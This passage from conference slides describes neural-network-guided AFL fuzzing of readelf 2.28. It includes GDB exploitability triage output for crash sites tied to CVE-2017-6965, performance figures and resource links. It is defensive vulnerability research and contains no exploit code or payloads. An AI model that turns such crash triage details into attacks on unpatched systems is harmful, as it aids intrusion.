  • 33. #RSAC Improved fuzzing intuition Model Input: Mutated files that have increased code coverage Encode input file content as a sequence of bytes Train with neural network architectures good at handling variable length sequences: LSTM, sequence-to-sequence Learned function Heatmaps of “usefulness” rating for each bit location in the input file Scoring Measured as potential to help discover new code paths 1 = mutation at this location will likely help discover new code paths 0 = ignore file location from mutation
  • 34. #RSAC readelf dataset example 180 input files divided into training and validation sets 24h run of AFL on training set Training data collected Mutated files generated by AFL Code-coverage bitmaps from execution of the target program on mutated inputs Sampled at 1% Training Validation ~200kb per file
  • 35. #RSAC Example | readelf 2.28 model Heatmap produced for one given ELF file Red locations are deemed interesting to mutate ELF Header format (Source: Wikipedia) … … … … 0x3A 2 e_shentsize size of a section header table entry. 0x3C 2 e_shnum number of entries in the section header table. 0x3E 2 e_shstrndx index of the section header table entry that contains the section names.
  • 36. #RSAC
  • 37. #RSAC Analysis by GDB exploitable plugin https://github.com/jfoote/exploitable Target: Linux readelf 2.28 Program received signal SIGSEGV, Segmentation fault. 0x000000000055e30b in byte_put_little_endian (field=0x1007dd6f6 <error: Cannot access memory at address 0x1007dd6f6>, value=0, size=2) at elfcomm.c:81 Description: Access violation on destination operand Short description: DestAv (8/22) Hash: 23ebf3e1c7d53d629ee996b7a33e133e.eddea00d61e72e006d47dab261ea1f05 Exploitability Classification: EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. 0x000000000045a9f3 in target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7ddfb8) at readelf.c:11629 Description: Access violation on source operand Short description: SourceAv (19/22) Hash: 6f55d3fddb7262be6e31745ee2574742.d27dd344b9a2892fc0d4d4f739f2f639 Exploitability Classification: UNKNOWN Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. 0x000000000055e283 in byte_put_little_endian (field=0xff000000007de2f2 <error: Cannot access memory at address 0xff000000007de2f2>, value=18446744073709551611, size=4) at elfcomm.c:75 Description: Access violation Short description: AccessViolation (21/22) Hash: 5a23cb8faf4189a00a5872ce9565218c.5de26e356c24993825d74ceade27e81f Exploitability Classification: UNKNOWN Explanation: The target crashed due to an access violation but there is not enough additional information available to determine exploitability. Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 Description: Heap error Short description: HeapError (10/22) Hash: cc68e1a9699d9946c2efe4adb95e6f13.f6583f17f75906da3c88b0cd8e5d6c7a Exploitability Classification: EXPLOITABLE Explanation: The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. Other tags: AbortSignal (20/22) Program received signal SIGSEGV, Segmentation fault. target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dd828) at readelf.c:11666 Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: e0167387d6ee8286447199f310e69c4d.faf899c223c7d3c22b94eba413b011f8 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a s imple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dde40) at readelf.c:11695 Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: 73ce00dc337b153d0ecef457ecb08164.37705e2795c3218a99249070847f80f8 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a s imple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) CVE-2017-6965 6 crash sites: 2 EXPLOITABLE, 2 UNKNOWN, 2 NOT EXPLOITABLE Found by Neural AFL but not standard AFL | All fixed in readelf 2.30
  • 38. #RSAC Readelf model performance over 48h and productization Model trained Size of data: 20 GB Collected from: a 24h fuzzing run of AFL Completed within: 12h Model query AFL modified to query model 50% of the time Dataset Unique Code Paths Number of Crashes AFL 8,123 1 Neural 9,207 62 Bugs reproduced, triaged, and reported automatically in MSRD web portal for software being tested (https://www.microsoft.com/en-us/security-risk-detection/)
  • 39. #RSAC Conclusion • Transfer Learning helps • To reuse already developed algorithms in an organization • To conserve resources across projects • Three Early Attempts at Transfer Learning: • Detecting Malicious Network Activity in Azure • Detecting Obfuscated PowerShell command lines • Fuzzing using Neural Nets
  • 40. #RSAC Resources • Microsoft Booth at RSA • Experiment with Transfer Learning - https://docs.microsoft.com/en-us/cognitive- toolkit/Build-your-own-image-classifier-using-Transfer-Learning • Publications: • Detecting Obfuscated PowerShell - https://arxiv.org/pdf/1804.04177.pdf • Neural Fuzzing - https://www.microsoft.com/en-us/research/publication/not-all- bytes-are-equal-neural-byte-sieve-for-fuzzing/ • Free Online Training: • Azure Security and Compliance (edX) - https://www.edx.org/course/azure-security- and-compliance • Microsoft Professional Program For AI https://academy.microsoft.com/en- us/professional-program/tracks/artificial-intelligence/